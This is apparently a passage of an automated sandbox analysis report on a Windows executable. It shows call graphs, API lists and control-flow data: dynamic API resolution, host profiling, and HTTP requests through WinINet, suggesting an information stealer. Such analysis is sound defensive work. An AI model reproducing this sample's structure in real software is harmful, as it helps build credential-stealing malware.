624a60 2 API calls 26343->26344 26345 623f7c 26344->26345 26346 624a60 2 API calls 26345->26346 26347 623f92 26346->26347 26348 624a60 2 API calls 26347->26348 26349 623fa8 26348->26349 26350 624a60 2 API calls 26349->26350 26351 623fbe 26350->26351 26352 624a60 2 API calls 26351->26352 26353 623fd4 26352->26353 26354 624a60 2 API calls 26353->26354 26355 623fea 26354->26355 26356 624a60 2 API calls 26355->26356 26357 624003 26356->26357 26358 624a60 2 API calls 26357->26358 26359 624019 26358->26359 26360 624a60 2 API calls 26359->26360 26361 62402f 26360->26361 26362 624a60 2 API calls 26361->26362 26363 624045 26362->26363 26364 624a60 2 API calls 26363->26364 26365 62405b 26364->26365 26366 624a60 2 API calls 26365->26366 26367 624071 26366->26367 26368 624a60 2 API calls 26367->26368 26369 62408a 26368->26369 26370 624a60 2 API calls 26369->26370 26371 6240a0 26370->26371 26372 624a60 2 API calls 26371->26372 26373 6240b6 26372->26373 26374 624a60 2 API calls 26373->26374 26375 6240cc 26374->26375 26376 624a60 2 API calls 26375->26376 26377 6240e2 26376->26377 26378 624a60 2 API calls 26377->26378 26379 6240f8 26378->26379 26380 624a60 2 API calls 26379->26380 26381 624111 26380->26381 26382 624a60 2 API calls 26381->26382 26383 624127 26382->26383 26384 624a60 2 API calls 26383->26384 26385 62413d 26384->26385 26386 624a60 2 API calls 26385->26386 26387 624153 26386->26387 26388 624a60 2 API calls 26387->26388 26389 624169 26388->26389 26390 624a60 2 API calls 26389->26390 26391 62417f 26390->26391 26392 624a60 2 API calls 26391->26392 26393 624198 26392->26393 26394 624a60 2 API calls 26393->26394 26395 6241ae 26394->26395 26396 624a60 2 API calls 26395->26396 26397 6241c4 26396->26397 26398 624a60 2 API calls 26397->26398 26399 6241da 26398->26399 26400 624a60 2 API calls 26399->26400 26401 6241f0 26400->26401 26402 624a60 2 API calls 26401->26402 26403 624206 26402->26403 26404 624a60 2 API calls 26403->26404 26405 62421f 26404->26405 26406 624a60 2 API calls 26405->26406 26407 624235 26406->26407 26408 624a60 2 API calls 26407->26408 26409 62424b 26408->26409 26410 624a60 2 API calls 26409->26410 26411 624261 26410->26411 26412 624a60 2 API calls 26411->26412 26413 624277 26412->26413 26414 624a60 2 API calls 26413->26414 26415 62428d 26414->26415 26416 624a60 2 API calls 26415->26416 26417 6242a6 26416->26417 26418 624a60 2 API calls 26417->26418 26419 6242bc 26418->26419 26420 624a60 2 API calls 26419->26420 26421 6242d2 26420->26421 26422 624a60 2 API calls 26421->26422 26423 6242e8 26422->26423 26424 624a60 2 API calls 26423->26424 26425 6242fe 26424->26425 26426 624a60 2 API calls 26425->26426 26427 624314 26426->26427 26428 624a60 2 API calls 26427->26428 26429 62432d 26428->26429 26430 624a60 2 API calls 26429->26430 26431 624343 26430->26431 26432 624a60 2 API calls 26431->26432 26433 624359 26432->26433 26434 624a60 2 API calls 26433->26434 26435 62436f 26434->26435 26436 624a60 2 API calls 26435->26436 26437 624385 26436->26437 26438 624a60 2 API calls 26437->26438 26439 62439b 26438->26439 26440 624a60 2 API calls 26439->26440 26441 6243b4 26440->26441 26442 624a60 2 API calls 26441->26442 26443 6243ca 26442->26443 26444 624a60 2 API calls 26443->26444 26445 6243e0 26444->26445 26446 624a60 2 API calls 26445->26446 26447 6243f6 26446->26447 26448 624a60 2 API calls 26447->26448 26449 62440c 26448->26449 26450 624a60 2 API calls 26449->26450 26451 624422 26450->26451 26452 624a60 2 API calls 26451->26452 26453 62443b 26452->26453 26454 624a60 2 API calls 26453->26454 26455 624451 26454->26455 26456 624a60 2 API calls 26455->26456 26457 624467 26456->26457 26458 624a60 2 API calls 26457->26458 26459 62447d 26458->26459 26460 624a60 2 API calls 26459->26460 26461 624493 26460->26461 26462 624a60 2 API calls 26461->26462 26463 6244a9 26462->26463 26464 624a60 2 API calls 26463->26464 26465 6244c2 26464->26465 26466 624a60 2 API calls 26465->26466 26467 6244d8 26466->26467 26468 624a60 2 API calls 26467->26468 26469 6244ee 26468->26469 26470 624a60 2 API calls 26469->26470 26471 624504 26470->26471 26472 624a60 2 API calls 26471->26472 26473 62451a 26472->26473 26474 624a60 2 API calls 26473->26474 26475 624530 26474->26475 26476 624a60 2 API calls 26475->26476 26477 624549 26476->26477 26478 624a60 2 API calls 26477->26478 26479 62455f 26478->26479 26480 624a60 2 API calls 26479->26480 26481 624575 26480->26481 26482 624a60 2 API calls 26481->26482 26483 62458b 26482->26483 26484 624a60 2 API calls 26483->26484 26485 6245a1 26484->26485 26486 624a60 2 API calls 26485->26486 26487 6245b7 26486->26487 26488 624a60 2 API calls 26487->26488 26489 6245d0 26488->26489 26490 624a60 2 API calls 26489->26490 26491 6245e6 26490->26491 26492 624a60 2 API calls 26491->26492 26493 6245fc 26492->26493 26494 624a60 2 API calls 26493->26494 26495 624612 26494->26495 26496 624a60 2 API calls 26495->26496 26497 624628 26496->26497 26498 624a60 2 API calls 26497->26498 26499 62463e 26498->26499 26500 624a60 2 API calls 26499->26500 26501 624657 26500->26501 26502 624a60 2 API calls 26501->26502 26503 62466d 26502->26503 26504 624a60 2 API calls 26503->26504 26505 624683 26504->26505 26506 624a60 2 API calls 26505->26506 26507 624699 26506->26507 26508 624a60 2 API calls 26507->26508 26509 6246af 26508->26509 26510 624a60 2 API calls 26509->26510 26511 6246c5 26510->26511 26512 624a60 2 API calls 26511->26512 26513 6246de 26512->26513 26514 624a60 2 API calls 26513->26514 26515 6246f4 26514->26515 26516 624a60 2 API calls 26515->26516 26517 62470a 26516->26517 26518 624a60 2 API calls 26517->26518 26519 624720 26518->26519 26520 624a60 2 API calls 26519->26520 26521 624736 26520->26521 26522 624a60 2 API calls 26521->26522 26523 62474c 26522->26523 26524 624a60 2 API calls 26523->26524 26525 624765 26524->26525 26526 624a60 2 API calls 26525->26526 26527 62477b 26526->26527 26528 624a60 2 API calls 26527->26528 26529 624791 26528->26529 26530 624a60 2 API calls 26529->26530 26531 6247a7 26530->26531 26532 624a60 2 API calls 26531->26532 26533 6247bd 26532->26533 26534 624a60 2 API calls 26533->26534 26535 6247d3 26534->26535 26536 624a60 2 API calls 26535->26536 26537 6247ec 26536->26537 26538 624a60 2 API calls 26537->26538 26539 624802 26538->26539 26540 624a60 2 API calls 26539->26540 26541 624818 26540->26541 26542 624a60 2 API calls 26541->26542 26543 62482e 26542->26543 26544 624a60 2 API calls 26543->26544 26545 624844 26544->26545 26546 624a60 2 API calls 26545->26546 26547 62485a 26546->26547 26548 624a60 2 API calls 26547->26548 26549 624873 26548->26549 26550 624a60 2 API calls 26549->26550 26551 624889 26550->26551 26552 624a60 2 API calls 26551->26552 26553 62489f 26552->26553 26554 624a60 2 API calls 26553->26554 26555 6248b5 26554->26555 26556 624a60 2 API calls 26555->26556 26557 6248cb 26556->26557 26558 624a60 2 API calls 26557->26558 26559 6248e1 26558->26559 26560 624a60 2 API calls 26559->26560 26561 6248fa 26560->26561 26562 624a60 2 API calls 26561->26562 26563 624910 26562->26563 26564 624a60 2 API calls 26563->26564 26565 624926 26564->26565 26566 624a60 2 API calls 26565->26566 26567 62493c 26566->26567 26568 624a60 2 API calls 26567->26568 26569 624952 26568->26569 26570 624a60 2 API calls 26569->26570 26571 624968 26570->26571 26572 624a60 2 API calls 26571->26572 26573 624981 26572->26573 26574 624a60 2 API calls 26573->26574 26575 624997 26574->26575 26576 624a60 2 API calls 26575->26576 26577 6249ad 26576->26577 26578 624a60 2 API calls 26577->26578 26579 6249c3 26578->26579 26580 624a60 2 API calls 26579->26580 26581 6249d9 26580->26581 26582 624a60 2 API calls 26581->26582 26583 6249ef 26582->26583 26584 624a60 2 API calls 26583->26584 26585 624a08 26584->26585 26586 624a60 2 API calls 26585->26586 26587 624a1e 26586->26587 26588 624a60 2 API calls 26587->26588 26589 624a34 26588->26589 26590 624a60 2 API calls 26589->26590 26591 624a4a 26590->26591 26592 6466e0 26591->26592 26593 6466ed 43 API calls 26592->26593 26594 646afe 8 API calls 26592->26594 26593->26594 26595 646b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26594->26595 26596 646c08 26594->26596 26595->26596 26597 646c15 8 API calls 26596->26597 26598 646cd2 26596->26598 26597->26598 26599 646d4f 26598->26599 26600 646cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26598->26600 26601 646d5c 6 API calls 26599->26601 26602 646de9 26599->26602 26600->26599 26601->26602 26603 646df6 12 API calls 26602->26603 26604 646f10 26602->26604 26603->26604 26605 646f8d 26604->26605 26606 646f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26604->26606 26607 646f96 GetProcAddress GetProcAddress 26605->26607 26608 646fc1 26605->26608 26606->26605 26607->26608 26609 646ff5 26608->26609 26610 646fca GetProcAddress GetProcAddress 26608->26610 26611 647002 10 API calls 26609->26611 26612 6470ed 26609->26612 26610->26609 26611->26612 26613 6470f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26612->26613 26614 647152 26612->26614 26613->26614 26615 64716e 26614->26615 26616 64715b GetProcAddress 26614->26616 26617 647177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26615->26617 26618 64051f 26615->26618 26616->26615 26617->26618 26619 621530 26618->26619 26928 621610 26619->26928 26621 62153b 26622 621555 lstrcpy 26621->26622 26623 62155d 26621->26623 26622->26623 26624 621577 lstrcpy 26623->26624 26625 62157f 26623->26625 26624->26625 26626 621599 lstrcpy 26625->26626 26627 6215a1 26625->26627 26626->26627 26628 621605 26627->26628 26629 6215fd lstrcpy 26627->26629 26630 63f1b0 lstrlen 26628->26630 26629->26628 26631 63f1e4 26630->26631 26632 63f1f7 lstrlen 26631->26632 26633 63f1eb lstrcpy 26631->26633 26634 63f208 26632->26634 26633->26632 26635 63f21b lstrlen 26634->26635 26636 63f20f lstrcpy 26634->26636 26637 63f22c 26635->26637 26636->26635 26638 63f233 lstrcpy 26637->26638 26639 63f23f 26637->26639 26638->26639 26640 63f258 lstrcpy 26639->26640 26641 63f264 26639->26641 26640->26641 26642 63f286 lstrcpy 26641->26642 26643 63f292 26641->26643 26642->26643 26644 63f2ba lstrcpy 26643->26644 26645 63f2c6 26643->26645 26644->26645 26646 63f2ea lstrcpy 26645->26646 26708 63f300 26645->26708 26646->26708 26647 63f30c lstrlen 26647->26708 26648 63f4b9 lstrcpy 26648->26708 26649 63f3a1 lstrcpy 26649->26708 26650 63f3c5 lstrcpy 26650->26708 26651 621530 8 API calls 26651->26708 26652 63f4e8 lstrcpy 26683 63f4f0 26652->26683 26653 621530 8 API calls 26653->26683 26654 63f479 lstrcpy 26654->26708 26655 63f59c lstrcpy 26655->26683 26656 63f70f StrCmpCA 26661 63fe8e 26656->26661 26656->26708 26657 63f616 StrCmpCA 26657->26656 26657->26683 26658 63fa29 StrCmpCA 26669 63fe2b 26658->26669 26658->26708 26659 63f73e lstrlen 26659->26708 26660 63fd4d StrCmpCA 26663 63fd60 Sleep 26660->26663 26675 63fd75 26660->26675 26662 63fead lstrlen 26661->26662 26666 63fea5 lstrcpy 26661->26666 26667 63fec7 26662->26667 26663->26708 26664 63fa58 lstrlen 26664->26708 26665 63f64a lstrcpy 26665->26683 26666->26662 26673 63fee7 lstrlen 26667->26673 26677 63fedf lstrcpy 26667->26677 26668 63fe4a lstrlen 26671 63fe64 26668->26671 26669->26668 26670 63fe42 lstrcpy 26669->26670 26670->26668 26682 63fdce lstrlen 26671->26682 26684 63fe7c lstrcpy 26671->26684 26672 63f89e lstrcpy 26672->26708 26680 63ff01 26673->26680 26674 63fd94 lstrlen 26689 63fdae 26674->26689 26675->26674 26678 63fd8c lstrcpy 26675->26678 26676 63f76f lstrcpy 26676->26708 26677->26673 26678->26674 26679 63fbb8 lstrcpy 26679->26708 26688 63ff21 26680->26688 26691 63ff19 lstrcpy 26680->26691 26681 63fa89 lstrcpy 26681->26708 26690 63fde8 26682->26690 26683->26653 26683->26655 26683->26657 26683->26658 26683->26660 26683->26665 26694 63f698 lstrcpy 26683->26694 26697 63efb0 35 API calls 26683->26697 26703 63f924 lstrcpy 26683->26703 26704 63f99e StrCmpCA 26683->26704 26706 63fc3e lstrcpy 26683->26706 26707 63fcb8 StrCmpCA 26683->26707 26683->26708 26709 63f9cb lstrcpy 26683->26709 26710 63fce9 lstrcpy 26683->26710 26711 63ee90 28 API calls 26683->26711 26712 63fa19 lstrcpy 26683->26712 26713 63fd3a lstrcpy 26683->26713 26684->26682 26685 63f791 lstrcpy 26685->26708 26687 63f8cd lstrcpy 26687->26683 26692 621610 4 API calls 26688->26692 26689->26682 26695 63fdc6 lstrcpy 26689->26695 26698 63fe08 26690->26698 26700 63fe00 lstrcpy 26690->26700 26691->26688 26714 63fe13 26692->26714 26693 63faab lstrcpy 26693->26708 26694->26683 26695->26682 26696 63fbe7 lstrcpy 26696->26683 26697->26683 26701 621610 4 API calls 26698->26701 26699 63ee90 28 API calls 26699->26708 26700->26698 26701->26714 26702 63f7e2 lstrcpy 26702->26708 26703->26683 26704->26658 26704->26683 26705 63fafc lstrcpy 26705->26708 26706->26683 26707->26660 26707->26683 26708->26647 26708->26648 26708->26649 26708->26650 26708->26651 26708->26652 26708->26654 26708->26656 26708->26658 26708->26659 26708->26660 26708->26664 26708->26672 26708->26676 26708->26679 26708->26681 26708->26683 26708->26685 26708->26687 26708->26693 26708->26696 26708->26699 26708->26702 26708->26705 26709->26683 26710->26683 26711->26683 26712->26683 26713->26683 26714->25738 26716 642785 26715->26716 26717 64278c GetVolumeInformationA 26715->26717 26716->26717 26718 6427ec GetProcessHeap RtlAllocateHeap 26717->26718 26720 642826 wsprintfA 26718->26720 26721 642822 26718->26721 26720->26721 26938 6471e0 26721->26938 26725 624c70 26724->26725 26726 624c85 26725->26726 26727 624c7d lstrcpy 26725->26727 26942 624bc0 26726->26942 26727->26726 26729 624c90 26730 624ccc lstrcpy 26729->26730 26731 624cd8 26729->26731 26730->26731 26732 624cff lstrcpy 26731->26732 26733 624d0b 26731->26733 26732->26733 26734 624d2f lstrcpy 26733->26734 26735 624d3b 26733->26735 26734->26735 26736 624d6d lstrcpy 26735->26736 26737 624d79 26735->26737 26736->26737 26738 624da0 lstrcpy 26737->26738 26739 624dac InternetOpenA StrCmpCA 26737->26739 26738->26739 26740 624de0 26739->26740 26741 6254b8 InternetCloseHandle CryptStringToBinaryA 26740->26741 26946 643e70 26740->26946 26742 6254e8 LocalAlloc 26741->26742 26759 6255d8 26741->26759 26744 6254ff CryptStringToBinaryA 26742->26744 26742->26759 26745 625517 LocalFree 26744->26745 26746 625529 lstrlen 26744->26746 26745->26759 26747 62553d 26746->26747 26749 625563 lstrlen 26747->26749 26750 625557 lstrcpy 26747->26750 26748 624dfa 26751 624e23 lstrcpy lstrcat 26748->26751 26752 624e38 26748->26752 26754 62557d 26749->26754 26750->26749 26751->26752 26753 624e5a lstrcpy 26752->26753 26756 624e62 26752->26756 26753->26756 26755 62558f lstrcpy lstrcat 26754->26755 26757 6255a2 26754->26757 26755->26757 26758 624e71 lstrlen 26756->26758 26761 6255d1 26757->26761 26762 6255c9 lstrcpy 26757->26762 26760 624e89 26758->26760 26759->25767 26763 624e95 lstrcpy lstrcat 26760->26763 26764 624eac 26760->26764 26761->26759 26762->26761 26763->26764 26765 624ed5 26764->26765 26766 624ecd lstrcpy 26764->26766 26767 624edc lstrlen 26765->26767 26766->26765 26768 624ef2 26767->26768 26769 624efe lstrcpy lstrcat 26768->26769 26770 624f15 26768->26770 26769->26770 26771 624f36 lstrcpy 26770->26771 26772 624f3e 26770->26772 26771->26772 26773 624f65 lstrcpy lstrcat 26772->26773 26774 624f7b 26772->26774 26773->26774 26775 624fa4 26774->26775 26776 624f9c lstrcpy 26774->26776 26777 624fab lstrlen 26775->26777 26776->26775 26778 624fc1 26777->26778 26779 624fcd lstrcpy lstrcat 26778->26779 26780 624fe4 26778->26780 26779->26780 26781 62500d 26780->26781 26782 625005 lstrcpy 26780->26782 26783 625014 lstrlen 26781->26783 26782->26781 26784 62502a 26783->26784 26785 625036 lstrcpy lstrcat 26784->26785 26786 62504d 26784->26786 26785->26786 26787 625079 26786->26787 26788 625071 lstrcpy 26786->26788 26789 625080 lstrlen 26787->26789 26788->26787 26790 62509b 26789->26790 26791 6250ac lstrcpy lstrcat 26790->26791 26792 6250bc 26790->26792 26791->26792 26793 6250da lstrcpy lstrcat 26792->26793 26794 6250ed 26792->26794 26793->26794 26795 62510b lstrcpy 26794->26795 26796 625113 26794->26796 26795->26796 26797 625121 InternetConnectA 26796->26797 26797->26741 26798 625150 HttpOpenRequestA 26797->26798 26799 6254b1 InternetCloseHandle 26798->26799 26800 62518b 26798->26800 26799->26741 26953 647310 lstrlen 26800->26953 26804 6251a4 26961 6472c0 26804->26961 26807 647280 lstrcpy 26808 6251c0 26807->26808 26809 647310 3 API calls 26808->26809 26810 6251d5 26809->26810 26811 647280 lstrcpy 26810->26811 26812 6251de 26811->26812 26813 647310 3 API calls 26812->26813 26814 6251f4 26813->26814 26815 647280 lstrcpy 26814->26815 26816 6251fd 26815->26816 26817 647310 3 API calls 26816->26817 26818 625213 26817->26818 26819 647280 lstrcpy 26818->26819 26820 62521c 26819->26820 26821 647310 3 API calls 26820->26821 26822 625231 26821->26822 26823 647280 lstrcpy 26822->26823 26824 62523a 26823->26824 26825 6472c0 2 API calls 26824->26825 26826 62524d 26825->26826 26827 647280 lstrcpy 26826->26827 26828 625256 26827->26828 26829 647310 3 API calls 26828->26829 26830 62526b 26829->26830 26831 647280 lstrcpy 26830->26831 26832 625274 26831->26832 26833 647310 3 API calls 26832->26833 26834 625289 26833->26834 26835 647280 lstrcpy 26834->26835 26836 625292 26835->26836 26837 6472c0 2 API calls 26836->26837 26838 6252a5 26837->26838 26839 647280 lstrcpy 26838->26839 26840 6252ae 26839->26840 26841 647310 3 API calls 26840->26841 26842 6252c3 26841->26842 26843 647280 lstrcpy 26842->26843 26844 6252cc 26843->26844 26845 647310 3 API calls 26844->26845 26846 6252e2 26845->26846 26847 647280 lstrcpy 26846->26847 26848 6252eb 26847->26848 26849 647310 3 API calls 26848->26849 26850 625301 26849->26850 26851 647280 lstrcpy 26850->26851 26852 62530a 26851->26852 26853 647310 3 API calls 26852->26853 26854 62531f 26853->26854 26855 647280 lstrcpy 26854->26855 26856 625328 26855->26856 26857 6472c0 2 API calls 26856->26857 26858 62533b 26857->26858 26859 647280 lstrcpy 26858->26859 26860 625344 26859->26860 26861 625370 lstrcpy 26860->26861 26862 62537c 26860->26862 26861->26862 26863 6472c0 2 API calls 26862->26863 26864 62538a 26863->26864 26865 6472c0 2 API calls 26864->26865 26866 625397 26865->26866 26867 647280 lstrcpy 26866->26867 26868 6253a1 26867->26868 26869 6253b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26868->26869 26870 62549c InternetCloseHandle 26869->26870 26874 6253f2 26869->26874 26872 6254ae 26870->26872 26871 6253fd lstrlen 26871->26874 26872->26799 26873 62542e lstrcpy lstrcat 26873->26874 26874->26870 26874->26871 26874->26873 26875 625473 26874->26875 26876 62546b lstrcpy 26874->26876 26877 62547a InternetReadFile 26875->26877 26876->26875 26877->26870 26877->26874 26879 638cc6 ExitProcess 26878->26879 26894 638ccd 26878->26894 26880 638ee2 26880->25769 26881 638d06 lstrlen 26881->26894 26882 638d84 StrCmpCA 26882->26894 26883 638da4 StrCmpCA 26883->26894 26884 638e88 lstrlen 26884->26894 26885 638e6f StrCmpCA 26885->26894 26886 638d30 lstrlen 26886->26894 26887 638e56 StrCmpCA 26887->26894 26888 638d5a lstrlen 26888->26894 26889 638dbd StrCmpCA 26889->26894 26890 638ddd StrCmpCA 26890->26894 26891 638dfd StrCmpCA 26891->26894 26892 638e1d StrCmpCA 26892->26894 26893 638e3d StrCmpCA 26893->26894 26894->26880 26894->26881 26894->26882 26894->26883 26894->26884 26894->26885 26894->26886 26894->26887 26894->26888 26894->26889 26894->26890 26894->26891 26894->26892 26894->26893 26895 638ebb lstrcpy 26894->26895 26895->26894 26896->25775 26897->25777 26898->25783 26899->25785 26900->25791 26901->25793 26902->25799 26903->25803 26904->25809 26905->25811 26906->25815 26907->25829 26908->25833 26909->25831 26910->25828 26911->25831 26912->25846 26913->25867 26914->25837 26915->25838 26916->25861 26917->25863 26918->25871 26919->25875 26920->25876 26921->25886 26922->25890 26923->25889 26924->25885 26925->25889 26926->25899 26929 62161f 26928->26929 26930 62162b lstrcpy 26929->26930 26931 621633 26929->26931 26930->26931 26932 62164d lstrcpy 26931->26932 26934 621655 26931->26934 26932->26934 26933 621677 26936 621699 26933->26936 26937 621691 lstrcpy 26933->26937 26934->26933 26935 62166f lstrcpy 26934->26935 26935->26933 26936->26621 26937->26936 26939 6471e6 26938->26939 26940 642860 26939->26940 26941 6471fc lstrcpy 26939->26941 26940->25764 26941->26940 26943 624bd0 26942->26943 26943->26943 26944 624bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26943->26944 26945 624c41 26944->26945 26945->26729 26947 643e83 26946->26947 26948 643e9f lstrcpy 26947->26948 26949 643eab 26947->26949 26948->26949 26950 643ed5 GetSystemTime 26949->26950 26951 643ecd lstrcpy 26949->26951 26952 643ef3 26950->26952 26951->26950 26952->26748 26955 64732d 26953->26955 26954 62519b 26957 647280 26954->26957 26955->26954 26956 64733d lstrcpy lstrcat 26955->26956 26956->26954 26958 64728c 26957->26958 26959 6472b4 26958->26959 26960 6472ac lstrcpy 26958->26960 26959->26804 26960->26959 26963 6472dc 26961->26963 26962 6251b7 26962->26807 26963->26962 26964 6472ed lstrcpy lstrcat 26963->26964 26964->26962 26966 634c77 296 API calls 26994 6431f0 GetSystemInfo wsprintfA 26967 648471 123 API calls 2 library calls 26977 63e0f9 140 API calls 27010 636b79 138 API calls 26970 628c79 strlen malloc strcpy_s 27002 63f2f8 93 API calls 27011 621b64 162 API calls 27023 62bbf9 90 API calls 26978 643cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27012 638615 49 API calls 27024 6433c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27025 638615 48 API calls 26972 63e049 147 API calls 26979 642cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26973 642853 lstrcpy 26991 633959 244 API calls 26995 6301d9 126 API calls 26998 628e20 strlen malloc strcpy_s free std::exception::exception 26980 6430a0 GetSystemPowerStatus 26996 6429a0 GetCurrentProcess IsWow64Process 27013 634b29 304 API calls 27026 6323a9 298 API calls 27027 63abb2 120 API calls 26992 643130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27000 62f639 144 API calls 27003 6216b9 200 API calls 27016 62bf39 177 API calls 27018 627702 free ctype 26981 642880 10 API calls 26982 644480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26983 643480 6 API calls 27004 643280 7 API calls 26984 638c88 16 API calls 27019 62b309 98 API calls 26993 644e35 10 API calls 26974 642c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27021 649711 134 API calls __setmbcp 27028 638615 47 API calls 26985 64749e 8 API calls ctype 26986 632499 290 API calls 27029 62db99 675 API calls 26976 648819 6 API calls __getptd
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00624C7F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624CD2
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624D05
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624D35
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624D73
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00624DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00624DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 5fa965e554c11f8115ef694034c64db78346c705d76e1d0302d7eab0a88607e2
                          • Instruction ID: 97a64621f9b2c8e7d916f5b1e0a6b2d81af25f48e877ed96997e13bb52147512
                          • Opcode Fuzzy Hash: 5fa965e554c11f8115ef694034c64db78346c705d76e1d0302d7eab0a88607e2
                          • Instruction Fuzzy Hash: A852AF71D01A26ABCB61EFA4EC45ADE7BBBBF04311F050528F805A7251DB38DD418FA4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2125 646390-6463bd GetPEB 2126 6465c3-646623 LoadLibraryA * 5 2125->2126 2127 6463c3-6465be call 6462f0 GetProcAddress * 20 2125->2127 2129 646625-646633 GetProcAddress 2126->2129 2130 646638-64663f 2126->2130 2127->2126 2129->2130 2131 646641-646667 GetProcAddress * 2 2130->2131 2132 64666c-646673 2130->2132 2131->2132 2134 646675-646683 GetProcAddress 2132->2134 2135 646688-64668f 2132->2135 2134->2135 2136 6466a4-6466ab 2135->2136 2137 646691-64669f GetProcAddress 2135->2137 2139 6466d7-6466da 2136->2139 2140 6466ad-6466d2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                          APIs
                          • GetProcAddress.KERNEL32(75900000,01290720), ref: 006463E9
                          • GetProcAddress.KERNEL32(75900000,012907B0), ref: 00646402
                          • GetProcAddress.KERNEL32(75900000,012906A8), ref: 0064641A
                          • GetProcAddress.KERNEL32(75900000,012906C0), ref: 00646432
                          • GetProcAddress.KERNEL32(75900000,01298830), ref: 0064644B
                          • GetProcAddress.KERNEL32(75900000,012867C0), ref: 00646463
                          • GetProcAddress.KERNEL32(75900000,01286A00), ref: 0064647B
                          • GetProcAddress.KERNEL32(75900000,012907F8), ref: 00646494
                          • GetProcAddress.KERNEL32(75900000,01290558), ref: 006464AC
                          • GetProcAddress.KERNEL32(75900000,01290810), ref: 006464C4
                          • GetProcAddress.KERNEL32(75900000,012906F0), ref: 006464DD
                          • GetProcAddress.KERNEL32(75900000,01286740), ref: 006464F5
                          • GetProcAddress.KERNEL32(75900000,01290828), ref: 0064650D
                          • GetProcAddress.KERNEL32(75900000,01290708), ref: 00646526
                          • GetProcAddress.KERNEL32(75900000,012866A0), ref: 0064653E
                          • GetProcAddress.KERNEL32(75900000,01290840), ref: 00646556
                          • GetProcAddress.KERNEL32(75900000,012908A0), ref: 0064656F
                          • GetProcAddress.KERNEL32(75900000,01286700), ref: 00646587
                          • GetProcAddress.KERNEL32(75900000,012908E8), ref: 0064659F
                          • GetProcAddress.KERNEL32(75900000,01286820), ref: 006465B8
                          • LoadLibraryA.KERNEL32(012908B8,?,?,?,00641C03), ref: 006465C9
                          • LoadLibraryA.KERNEL32(012908D0,?,?,?,00641C03), ref: 006465DB
                          • LoadLibraryA.KERNEL32(01290870,?,?,?,00641C03), ref: 006465ED
                          • LoadLibraryA.KERNEL32(01290900,?,?,?,00641C03), ref: 006465FE
                          • LoadLibraryA.KERNEL32(01290918,?,?,?,00641C03), ref: 00646610
                          • GetProcAddress.KERNEL32(75070000,01290858), ref: 0064662D
                          • GetProcAddress.KERNEL32(75FD0000,01290888), ref: 00646649
                          • GetProcAddress.KERNEL32(75FD0000,01298DA8), ref: 00646661
                          • GetProcAddress.KERNEL32(75A50000,01298D00), ref: 0064667D
                          • GetProcAddress.KERNEL32(74E50000,012868C0), ref: 00646699
                          • GetProcAddress.KERNEL32(76E80000,01298840), ref: 006466B5
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 006466CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 006466C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
